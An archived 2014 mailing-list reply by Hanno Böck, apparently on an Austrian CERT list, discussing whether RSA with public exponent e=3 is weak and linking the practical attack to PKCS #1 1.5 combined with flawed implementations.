Deutsch | English

[Ach] some thoughts on POODLE, BERserk etc.

Hanno Böck hanno at
Tue Nov 4 23:01:47 CET 2014

Am Tue, 04 Nov 2014 21:47:55 +0000
schrieb ianG <iang at>:

> Nice article!!
> I use e=3, is it fundamentally broken?  Or just in cohoots with pkcs
> 1.5?

Basically I think the only practical attack on it is related to a
combination of pkcs #1 1.5, e=3 and a broken implementation.
(there's another attack against "plain" rsa that relies on small
exponents - but plain rsa is a no-go in so many ways this doesn't
really count)

However it feels to me that it's generally to be considered a risky

Hanno Böck

mail/jabber: hanno at
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: not available
URL: <>

More information about the Ach mailing list
Tel.: +43 1 5056416 78
mehr ...
mehr ...
mehr ...
Jahresbericht 2017
Ein Resumee zur digitalen Sicherheitslage in Österreich

Letzte Änderung: 2018/5/28 - 15:00:00
Haftungsausschluss / Datenschutzerklärung